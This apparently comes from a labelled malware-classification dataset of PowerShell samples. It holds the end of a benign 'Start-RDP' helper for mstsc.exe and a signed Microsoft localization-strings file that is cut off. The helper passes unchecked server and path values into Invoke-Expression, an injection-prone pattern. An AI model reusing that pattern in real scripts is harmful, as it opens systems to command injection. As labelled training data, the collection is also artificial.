-Height 768 # # # This command opens a new Remote Desktop connection to the server named "myserver" in a window with 1024x768 resolution. # # # -------------------------- EXAMPLE 3 -------------------------- # # C:\\PS>Start-RDP -Server myserver -Fullscreen # # # This command opens a new full screen Remote Desktop connection to the server named "myserver". # # # -------------------------- EXAMPLE 4 -------------------------- # # C:\\PS>Start-RDP -Path C:\\myserver.rdp # # # This command opens a new Remote Desktop connection using the specified RDP file. # # #Function global:Start-RDP { param( [string]$Server = "", [int]$Width = "", [int]$Height = "", [string]$Path = "", [switch]$Console, [switch]$Admin, [switch]$Fullscreen, [switch]$Public, [switch]$Span ) begin { $arguments = "" $dimensions = "" $processed = $false if ($admin) { $arguments += "/admin " } elseif ($console) { $arguments += "/console " } if ($fullscreen) { $arguments += "/f " } if ($public) { $arguments += "/public " } if ($span) { $arguments += "/span " } if ($width -and $height) { $dimensions = "/w:$width /h:$height" } } process { Function script:executePath([string]$path) { Invoke-Expression "mstsc.exe '$path' $dimensions $arguments" } Function script:executeArguments([string]$Server) { Invoke-Expression "mstsc.exe /v:$server $dimensions $arguments" } if ($_) { if ($_ -is [string]) { if ($_ -imatch '\\.rdp$') { if (Test-Path $_) { executePath $_ $processed = $true } else { throw "Path does not exist." } } else { executeArguments $_ $processed = $true } } elseif ($_ -is [System.IO.FileInfo]) { if (Test-Path $_.FullName) { executePath $_.FullName $processed = $true } else { throw "Path does not exist." } } elseif ($_.Path) { if (Test-Path $_.Path) { executePath $_.Path $processed = $true } else { throw "Path does not exist." } } elseif ($_.DnsName) { executeArguments $_.DnsName $processed = $true } elseif ($_.Server) { executeArguments $_.Server $processed = $true } elseif ($_.ServerName) { executeArguments $_.ServerName $processed = $true } elseif ($_.Name) { executeArguments $_.Name $processed = $true } } } end { if ($path) { if (Test-Path $path) { Invoke-Expression "mstsc.exe '$path' $dimensions $arguments" } else { throw "Path does not exist." } } elseif ($server) { Invoke-Expression "mstsc.exe /v:$server $dimensions $arguments" } elseif (-not $processed) { Invoke-Expression "mstsc.exe $dimensions $arguments" } } #}
combined_dataset/train/non-malicious/sample_50_74.ps1
sample_50_74.ps1
# # Copyright (c) Microsoft Corporation. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ConvertFrom-StringData @' ###PSLOC StartGetPackageSource=Begin invoking Get-packageSource {0} StartRegisterPackageSource=Begin invoking Register-Packagesource {0} StartUnRegisterPackageSource=Begin invoking UnRegister-Packagesource {0} PackageSourceFound=Package source '{0}' found PackageSourceNotFound=Package source '{0}' not found RegisteredSuccess=Successfully registered the package source {0} UnRegisteredSuccess=Successfully unregistered the package source {0} RegisterFailed=Failed to register the package source {0}. Message:{1} UnRegisterFailed=Failed to register the package source {0}. Message:{1} InDesiredState=Resource {0} is in the desired state. Required Ensure is {1} and actual Ensure is {2} NotInDesiredState=Resource {0} is not in the desired state. Required Ensure is {1} and actual Ensure is {2} NotInDesiredStateDuetoLocationMismatch=Resource {0} is not in the desired state. Required location is {1} and registered is {2} NotInDesiredStateDuetoPolicyMismatch=Resource {0} is not in the desired state. Required installation policy is {1} and registered is {2} InstallationPolicyWarning=Begin registering '{0}' to source location '{1}' with '{2}' policy" ###PSLOC '@ # SIG # Begin signature block # MIInvQYJKoZIhvcNAQcCoIInrjCCJ6oCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDFuym1v/NtoXxJ # gjHj6HUj0SEsN/GPakQw8oc6hd5e16CCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ0wghmZAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIATZA7LJPyCoN3GjbGxrPSVp # T74sycop1NpRf9jCRv8CMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAZIi0sox2XVUUp4hiLY/mmnxFTT9MFsMC9nzG6pROu4HW4uxbEf71KCSg # PRV7l3AbwMGaeP/VsG8Qswq2SVfUTt7/1bqhBay7Ic6cnPgGeaP1bTQD2A558Nrm # 7UMlqx9LA+KidehgAS26gV5mxwXs4f+Yn15wzr8HBIZF9ptnSqsdoShpiPYezyGe # UhxvBa8O9G9JJ4dwviKza+v2q92V3+XcJYz9HpnlHDVrIz+yFeANElrcy+cxlTBd # BphA7PFIN0XiscbuyMi4haRQHau2YJ35pdmXUkMFqIRoRxs6V3moh2hwzDSgxxQ6 # r6e1lj5Oz8NNixsYRF2YdCjyQcCRY6GCFycwghcjBgorBgEEAYI3AwMBMYIXEzCC # Fw8GCSqGSIb3DQEHAqCCFwAwghb8AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFXBgsq # hkiG9w0BCRABBKCCAUYEggFCMIIBPgIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCD6OzrgUPVT6KEPTNJ457Q+67nVfV74NQwELOqlDNYg4gIGZh/GnLIW # GBEyMDI0MDQyMzAyMjQwOC45WjAEgAIB9KCB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # RDQxLTRCRjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaCCEXgwggcnMIIFD6ADAgECAhMzAAAB49+9m5ocaIMiAAEAAAHjMA0GCSqG # SIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIzMTAx # MjE5MDcyOVoXDTI1MDExMDE5MDcyOVowgdIxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046OEQ0MS00QkY3 # LUIzQjcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIi # MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC+pA1oHkafn8UgVA+jf8rhCaV4 # IMwXjRuSgfDPQGyFnhKJCYDoIZTIPCZqpDbAeFpdTRF0e3C+r5TwrFhizIcqprHE # Lt+v/Idm8ek1ODPHVWRHeleFPpfYKbXvlRfdZDiN+XzqienkAzMEgUOXPRJTxVIo # 0wO81e2OT0WK0uBS/aePeE4nQqQRB+TegDubvMDQP4yjveGZH44Lu7CxfElHa3NR # kTRJNhfdS96cUft9hbLkE2YvIaraxaRDkcW8koIkAT93B+3z5XjdTcp4TEX+k+1w # tS9D0cisvTGekwVq7th3lor5MSLntZy0G/zv59I9kFXeNmX9AK1wf1aueIEPCSL1 # B9HG78ljPD6JoRYuqthe4XuN44a8cr59V4tacBzlbGx9umMQyk1sZdtIX0C3c8+E # VU6PHBUTHUAsZSpEp6HD1qn1f+B+QD0j15NK/AnP3DJr2t4OBL7qReBK20jtFDZw # kb+1A8ZUhosIhpJp8ud5qrQGezS3j4RbcH8aegEyKI5fCV469/m50FlAgwneTmqe # eHxnhmFPCsTqIZs+tOAYE9eHt7EVgAaVvqF2EgshUN0mUN/yzU1W8vRDbLhIdlCE # CllO5b+3Iawaxwg8NIzPlsDo2FEu2MTAIWksjmoaW7nQC70VF6UIRCxaDurTsf+u # oc6oI0kzhGN6buOgRQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFLGuDWa+NRW3oWfG # PnqdptmImKkDMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1Ud # HwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3Js # L01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggr # BgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNv # bS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIw # MTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgw # DgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQC3vpsuqdTTzBFtbe9G # vGNoRsY+rIg0rpRgLOFMZpH88TAInOI9Phkz2x8ZNfd5kNBUT2vXbW0W2ns1dBi5 # BLFFkxhdrT+lrA3Zef5Q+MFEO+gKxTnp3AqSubLxNLDtBcoayR2cTCwjnJb3erwC # DzpGQGIoQR/0V3Mc24pYjgq//98O0RJ7C7jqf+75VyQLBs5iXrAT/9BEasYyrnT1 # rgRs/6nUZSbTpeZ7/TWZMi4oOA+YcvadhHNc2qLYi4h5yfZpbCRHFA4WI/D52JyY # 47Asb/sic2qNmlB4iEMzGxavjNPHPLgRH/rN+2G2UO1wBccHthFSQFMKVo5rSd29 # 80lkzJhVrpxa9mi5Or1XktLtTMhHxL/tGw5Pjd45rAsGy5DPRWg4u6th7VJ98+pO # wJxE3NvHQLy3/4qKlK1WE8Aa20R+F1RRL2iEPou3rA0InFltXQgwPyd8TqAhAlev # OtdY64mo33VYPKNFqfhQoOQgFLbJYDhbomFC4HMZ6s5Jj9oufGRGtK5uC2cphwc7 # CDFNMjJrlZgJGMW3RA4uV6pWSLqT6apg+v3y4w+Lm9EhBLbTqYNJ6dK2vzDQn7/7 # VYSbc+cIIhCCl/rOGpGsC32PtesQweuDZtB6BrPxsvNt7pSJuBsq1HKTWcZ17xOj # mTIyP1dQIEgIPFP4XjFrmU1lVDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkA # AAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX # YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg # Q29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRl # IEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVow # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUA # A4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX # 9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1q # UoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8d # q6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byN # pOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2k # rnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4d # Pf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgS # Uei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8 # QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6Cm # gyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzF # ER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQID # AQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQU # KqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1 # GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0 # dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0 # bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMA # QTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbL # j+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1p # Y3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3 # Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIz # LmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwU # tj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN # 3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU # 5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5 # KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGy # qVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB6 # 2FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltE # AY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFp # AUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcd # FYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRb # atGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQd # VTNYs6FwZvKhggLUMIICPQIBATCCAQChgdikgdUwgdIxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5k # IE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046OEQ0 # MS00QkY3LUIzQjcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZp # Y2WiIwoBATAHBgUrDgMCGgMVAD2Il7vDkUOIbynLhOxitAjoMVp6oIGDMIGApH4w # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDp # 0YSuMCIYDzIwMjQwNDIzMDg1MTU4WhgPMjAyNDA0MjQwODUxNThaMHQwOgYKKwYB # BAGEWQoEATEsMCowCgIFAOnRhK4CAQAwBwIBAAICANgwBwIBAAICE9cwCgIFAOnS # 1i4CAQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAweh # IKEKMAgCAQACAwGGoDANBgkqhkiG9w0BAQUFAAOBgQAa9wghXnCrY1fhto7EZuhy # N+lFGw4NLNQc8NO4epBEqH512QZWhIBoNzV+E6LOZFiOD1jlKHSfioVmbQ/HMzz/ # 55TYpkGy5C7/N+3/DTNc0gxcN/IiMa5fbzMJ9RX7/EdGA3rDO3Mlz8iOO/KtOikp # dd64rTjowf4KGKa4e5GCNzGCBA0wggQJAgEBMIGTMHwxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0 # YW1wIFBDQSAyMDEwAhMzAAAB49+9m5ocaIMiAAEAAAHjMA0GCWCGSAFlAwQCAQUA # oIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcNAQkEMSIE # ID0l5SEdLL4EbblH7euzz45PN9u/rbguXbccHaDXXlZXMIH6BgsqhkiG9w0BCRAC # LzGB6jCB5zCB5DCBvQQgM9Qjq+Ww/mT3RIEI1r3CFrgyXEG3YKvDXY9McjLmJiow # gZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYw # JAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAePfvZua # HGiDIgABAAAB4zAiBCAna5Ry7VdN8K8PgoZVVzcLz0Bpw/tIe/+x1f2pYM6dSzAN # BgkqhkiG9w0BAQsFAASCAgAx6cbqfy4NOGeQJEpXsQiTOne1S1LITkkdgyWCJD7m # WYd46xsbIlXIeS2mHhPsADG08JaXlUwfkUIM8aYlloApQNZ6ATzdW2BKjhS3Qd+0 # YKHcCdVxS6LglvB3+K2whozRbho0Lj7tBMgd1evdnh8NFqa7QnSLd6d34rs9y9YY # K0/m6KHfhoL0JaoQM1B8MGek/yl++l2v2DFAR0GUTS7xmREXwtfYYQ799vPkiwZ8 # Ta/J78BG+N256WSedy/56wReNYNIHLHO7nMkAjqnST6JLXR/ZrkH9MUpdcLX6EmP # SjPUaq3zJ2mqhVi6UKO77SQ2T+b0MocuTw0WjwSQQnjirvYEcwLBIhFmeLaJZ1Rz # WIGAdDWsJCTUV6eAZba/X2RwqE/sgDcKJC3lEcWMEqCptIeLLZfY1BLfqXrKWzJv # 